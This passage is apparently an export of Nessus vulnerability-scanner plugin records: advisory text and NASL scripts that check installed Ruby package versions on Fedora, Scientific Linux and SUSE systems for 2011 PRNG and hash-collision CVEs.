script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"ruby-1.8.7.352-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:46:45", "description": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to do system management tasks.\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom number generator) after forking a child process. This could eventually lead to the PRNG returning the same result twice. An attacker keeping track of the values returned by one child process could use this flaw to predict the values the PRNG would return in other child processes (as long as the parent process persisted). (CVE-2011-3009)\n\nA flaw was found in the Ruby SecureRandom module. When using the SecureRandom.random_bytes class, the PRNG state was not modified after forking a child process. This could eventually lead to SecureRandom.random_bytes returning the same string more than once. An attacker keeping track of the strings returned by one child process could use this flaw to predict the strings SecureRandom.random_bytes would return in other child processes (as long as the parent process persisted). (CVE-2011-2705)\n\nThis update also fixes the following bugs :\n\n - The ruby package has been upgraded to upstream point release 1.8.7-p352, which provides a number of bug fixes over the previous version.\n\n - The MD5 message-digest algorithm is not a FIPS-approved algorithm. Consequently, when a Ruby script attempted to calculate an MD5 checksum in FIPS mode, the interpreter terminated unexpectedly. This bug has been fixed and an exception is now raised in the described scenario.\n\n - Due to inappropriately handled line continuations in the mkconfig.rb source file, an attempt to build the ruby package resulted in unexpected termination. An upstream patch has been applied to address this issue and the ruby package can now be built properly.\n\n - When the 32-bit ruby-libs library was installed on a 64-bit machine, the mkmf library failed to load various modules necessary for building Ruby-related packages.\n This bug has been fixed and mkmf now works properly in the described scenario.\n\n - Previously, the load paths for scripts and binary modules were duplicated on the i386 architecture.\n Consequently, an ActiveSupport test failed. With this update, the load paths are no longer stored in duplicates on the i386 architecture.\n\nThis update also adds the following enhancement :\n\n - With this update, SystemTap probes have been added to the ruby package.\n\nAll users of ruby are advised to upgrade to these updated packages, which resolve these issues and add this enhancement.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : ruby on SL6.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705", "CVE-2011-3009"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20111206_RUBY_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61197", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61197);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-2686\");\n\n script_name(english:\"Scientific Linux Security Update : ruby on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ruby is an extensible, interpreted, object-oriented, scripting\nlanguage. It has features to process text files and to do system\nmanagement tasks.\n\nIt was found that Ruby did not reinitialize the PRNG (pseudorandom\nnumber generator) after forking a child process. This could eventually\nlead to the PRNG returning the same result twice. An attacker keeping\ntrack of the values returned by one child process could use this flaw\nto predict the values the PRNG would return in other child processes\n(as long as the parent process persisted). (CVE-2011-3009)\n\nA flaw was found in the Ruby SecureRandom module. When using the\nSecureRandom.random_bytes class, the PRNG state was not modified after\nforking a child process. This could eventually lead to\nSecureRandom.random_bytes returning the same string more than once. An\nattacker keeping track of the strings returned by one child process\ncould use this flaw to predict the strings SecureRandom.random_bytes\nwould return in other child processes (as long as the parent process\npersisted). (CVE-2011-2705)\n\nThis update also fixes the following bugs :\n\n - The ruby package has been upgraded to upstream point\n release 1.8.7-p352, which provides a number of bug fixes\n over the previous version.\n\n - The MD5 message-digest algorithm is not a FIPS-approved\n algorithm. Consequently, when a Ruby script attempted to\n calculate an MD5 checksum in FIPS mode, the interpreter\n terminated unexpectedly. This bug has been fixed and an\n exception is now raised in the described scenario.\n\n - Due to inappropriately handled line continuations in the\n mkconfig.rb source file, an attempt to build the ruby\n package resulted in unexpected termination. An upstream\n patch has been applied to address this issue and the\n ruby package can now be built properly.\n\n - When the 32-bit ruby-libs library was installed on a\n 64-bit machine, the mkmf library failed to load various\n modules necessary for building Ruby-related packages.\n This bug has been fixed and mkmf now works properly in\n the described scenario.\n\n - Previously, the load paths for scripts and binary\n modules were duplicated on the i386 architecture.\n Consequently, an ActiveSupport test failed. With this\n update, the load paths are no longer stored in\n duplicates on the i386 architecture.\n\nThis update also adds the following enhancement :\n\n - With this update, SystemTap probes have been added to\n the ruby package.\n\nAll users of ruby are advised to upgrade to these updated packages,\nwhich resolve these issues and add this enhancement.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1112&L=scientific-linux-errata&T=0&P=1448\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?de78dd47\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"ruby-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-debuginfo-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-devel-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-docs-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-irb-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-libs-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-rdoc-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-ri-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-static-1.8.7.352-3.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"ruby-tcltk-1.8.7.352-3.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:50:07", "description": "This update of ruby provides 1.8.7p357, which contains many stability fixes and bug fixes, which are fully compatible with the previous version. You can review the detailed list here :\n\nhttp://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog\n\nThe particularly noteworthy fixes are :\n\n - Hash functions are now using a randomized seed to avoid algorithmic complexity attacks (CVE-2011-4815). For this OpenSSL::Random.seed at the SecureRandom.random_bytes is used if available.\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - initialize store->ex_data.sk.\n\n - some IPv6 related fixes\n\n - zlib fixes\n\n - reinitialize PRNG when forking children (CVE-2011-2686/CVE-2011-3009)\n\n - securerandom fixes (CVE-2011-2705)\n\n - uri route_to fixes\n\n - fix race condition with variables and autoload", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ruby (openSUSE-SU-2012:0228-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705", "CVE-2011-3009", "CVE-2011-4815"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ruby", "p-cpe:/a:novell:opensuse:ruby-debuginfo", "p-cpe:/a:novell:opensuse:ruby-debugsource", "p-cpe:/a:novell:opensuse:ruby-devel", "p-cpe:/a:novell:opensuse:ruby-doc-html", "p-cpe:/a:novell:opensuse:ruby-doc-ri", "p-cpe:/a:novell:opensuse:ruby-examples", "p-cpe:/a:novell:opensuse:ruby-test-suite", "p-cpe:/a:novell:opensuse:ruby-tk", "p-cpe:/a:novell:opensuse:ruby-tk-debuginfo", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_RUBY-120117.NASL", "href": "https://www.tenable.com/plugins/nessus/76015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update ruby-5660.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76015);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-3009\", \"CVE-2011-4815\");\n\n script_name(english:\"openSUSE Security Update : ruby (openSUSE-SU-2012:0228-1)\");\n script_summary(english:\"Check for the ruby-5660 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of ruby provides 1.8.7p357, which contains many stability\nfixes and bug fixes, which are fully compatible with the previous\nversion. You can review the detailed list here :\n\nhttp://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog\n\nThe particularly noteworthy fixes are :\n\n - Hash functions are now using a randomized seed to avoid\n algorithmic complexity attacks (CVE-2011-4815). For this\n OpenSSL::Random.seed at the SecureRandom.random_bytes is\n used if available.\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - initialize store->ex_data.sk.\n\n - some IPv6 related fixes\n\n - zlib fixes\n\n - reinitialize PRNG when forking children\n (CVE-2011-2686/CVE-2011-3009)\n\n - securerandom fixes (CVE-2011-2705)\n\n - uri route_to fixes\n\n - fix race condition with variables and autoload\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00024.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-test-suite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby-tk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-debuginfo-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-debugsource-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-devel-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-doc-html-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-doc-ri-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-examples-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-test-suite-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-tk-1.8.7.p357-0.2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ruby-tk-debuginfo-1.8.7.p357-0.2.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:59:10", "description": "This update of ruby provides 1.8.7p357, which contains many stability fixes and bug fixes while maintaining full compatibility with the previous version. A detailailed list of changes is available from http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog .\n\nThe most important fixes are :\n\n - Hash functions are now using a randomized seed to avoid algorithmic complexity attacks. If available, OpenSSL::Random.seed at the SecureRandom.random_bytes is used to achieve this. (CVE-2011-4815)\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - Initialize store->ex_data.sk.\n\n - Several IPv6 related fixes.\n\n - Fixes for zlib.\n\n - Reinitialize PRNG when forking children. (CVE-2011-2686 / CVE-2011-3009)\n\n - Fixes to securerandom. (CVE-2011-2705)\n\n - Fix uri route_to\n\n - Fix race condition with variables and autoload.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-06T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : ruby (SAT Patch Number 5716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705", "CVE-2011-3009", "CVE-2011-4815"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:ruby", "p-cpe:/a:novell:suse_linux:11:ruby-doc-html", "p-cpe:/a:novell:suse_linux:11:ruby-tk", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_RUBY-187P357-120126.NASL", "href": "https://www.tenable.com/plugins/nessus/57840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57840);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-3009\", \"CVE-2011-4815\");\n\n script_name(english:\"SuSE 11.1 Security Update : ruby (SAT Patch Number 5716)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of ruby provides 1.8.7p357, which contains many stability\nfixes and bug fixes while maintaining full compatibility with the\nprevious version. A detailailed list of changes is available from\nhttp://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog .\n\nThe most important fixes are :\n\n - Hash functions are now using a randomized seed to avoid\n algorithmic complexity attacks. If available,\n OpenSSL::Random.seed at the SecureRandom.random_bytes is\n used to achieve this. (CVE-2011-4815)\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - Initialize store->ex_data.sk.\n\n - Several IPv6 related fixes.\n\n - Fixes for zlib.\n\n - Reinitialize PRNG when forking children. (CVE-2011-2686\n / CVE-2011-3009)\n\n - Fixes to securerandom. (CVE-2011-2705)\n\n - Fix uri route_to\n\n - Fix race condition with variables and autoload.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2705.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-3009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-4815.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 5716.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ruby-tk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"ruby-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"ruby-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"ruby-doc-html-1.8.7.p357-0.7.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"ruby-tk-1.8.7.p357-0.7.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:59:10", "description": "This update of ruby provides 1.8.7p357, which contains many stability fixes and bug fixes while maintaining full compatibility with the previous version. A detailailed list of changes is available from http://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog .\n\nThe most important fixes are :\n\n - Hash functions are now using a randomized seed to avoid algorithmic complexity attacks. If available, OpenSSL::Random.seed at the SecureRandom.random_bytes is used to achieve this. (CVE-2011-4815)\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - Initialize store->ex_data.sk.\n\n - Several IPv6 related fixes.\n\n - Fixes for zlib.\n\n - Reinitialize PRNG when forking children. (CVE-2011-2686 / CVE-2011-3009)\n\n - Fixes to securerandom. (CVE-2011-2705)\n\n - Fix uri route_to\n\n - Fix race condition with variables and autoload.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-06T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : ruby (SAT Patch Number 5716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2686", "CVE-2011-2705", "CVE-2011-3009", "CVE-2011-4815"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:ruby", "p-cpe:/a:novell:suse_linux:11:ruby-doc-html", "p-cpe:/a:novell:suse_linux:11:ruby-tk", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_RUBY-187P357-120127.NASL", "href": "https://www.tenable.com/plugins/nessus/57841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57841);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-2686\", \"CVE-2011-2705\", \"CVE-2011-3009\", \"CVE-2011-4815\");\n\n script_name(english:\"SuSE 11.1 Security Update : ruby (SAT Patch Number 5716)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of ruby provides 1.8.7p357, which contains many stability\nfixes and bug fixes while maintaining full compatibility with the\nprevious version. A detailailed list of changes is available from\nhttp://svn.ruby-lang.org/repos/ruby/tags/v1_8_7_357/ChangeLog .\n\nThe most important fixes are :\n\n - Hash functions are now using a randomized seed to avoid\n algorithmic complexity attacks. If available,\n OpenSSL::Random.seed at the SecureRandom.random_bytes is\n used to achieve this. (CVE-2011-4815)\n\n - mkconfig.rb: fix for continued lines.\n\n - Fix Infinity to be greater than any bignum number.\n\n - Initialize store->ex_data.sk.\n\n - Several IPv6 related fixes.\n\n - Fixes for zlib.\n\n - Reinitialize PRNG when forking children. (CVE-2011-2686\n / CVE-2011-3009)\n\n - Fixes to securerandom. (CVE-2011-2705)\n\n - Fix uri route_to\n\n - Fix race condition with variables and autoload.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704409\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2011-2686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 